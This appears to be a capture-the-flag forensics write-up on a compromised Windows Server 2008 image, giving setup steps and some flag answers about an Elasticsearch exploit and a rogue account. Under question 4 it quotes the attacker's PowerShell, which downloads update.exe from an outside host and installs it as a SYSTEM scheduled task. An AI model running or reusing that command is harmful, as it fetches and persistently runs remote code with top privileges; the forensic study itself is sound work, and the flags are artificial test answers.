37 lines
2.2 KiB
Markdown
37 lines
2.2 KiB
Markdown
## Forensic Investigation Windows Server 2008
|
|
|
|
### Setup
|
|
Download .ova file.
|
|
Since m1 can't run x86 ova files on virtualbox extract files from .ova file with `tar -xvf <file>.ova`
|
|
Convert drive to qcow2
|
|
Reference: https://www.xmodulo.com/convert-ova-to-qcow2-linux.html
|
|
Run qemu with: `qemu-system-x86_64 -boot menu=on -m 4G -vga virtio -display cocoa <file>.qcow2`
|
|
|
|
## Questions:
|
|
|
|
### 1. What CVE did the attacker exploit to get a shell on the machine? Wrap your answer in byuctf{}. E.g. byuctf{CVE-2021-38759} Hint: Figure out what process the attacker exploited and look up vulnerabilities associated with it.
|
|
When opening sysmon logs a powershell process opens from elasticsearch. This was supspicous. The most likely exploit is one with a public CVE
|
|
|
|
byuctf{CVE-2014-3120}
|
|
### 2. Once they got in, the attacker ran some commands on the machine, but it looks like they tried to hide what they were doing. See if you can find anything interesting there
|
|
|
|
### 3. The attacker also created a new account what group did they add this account to?
|
|
According to https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/audit-user-account-management User Account creation has the Id 4720.
|
|
Opening Event Viewer and filtering for 4720 yields: 5/15/2025 7:08:28 pm User account **phasma** was created
|
|
To get the groups we have to look at Event 4732 https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732
|
|
This yields two entries from 5/15/2025:
|
|
- BUILTIN\Users
|
|
- BUILTIN\Remote Desktop Users
|
|
|
|
=> Flag: byuctf{Remote Desktop Users}
|
|
### 4. Using their access, the attacker also deployed a C2 binary on the machine - what C2 framework was it, and what IP address was the C2 attempting to connect to?
|
|
|
|
$BINARY='C:\Windows\System32\update.exe;
|
|
$ProgressPreference = 'SilentlyContinue';
|
|
Invoke-webrequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $Binary ;
|
|
schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest ;
|
|
schtasks /run /tn "updates"
|
|
|
|
### 5. Last but not least, the attacker put another backdoor in the machine to give themself SYSTEM privileges... what was it?
|
|
|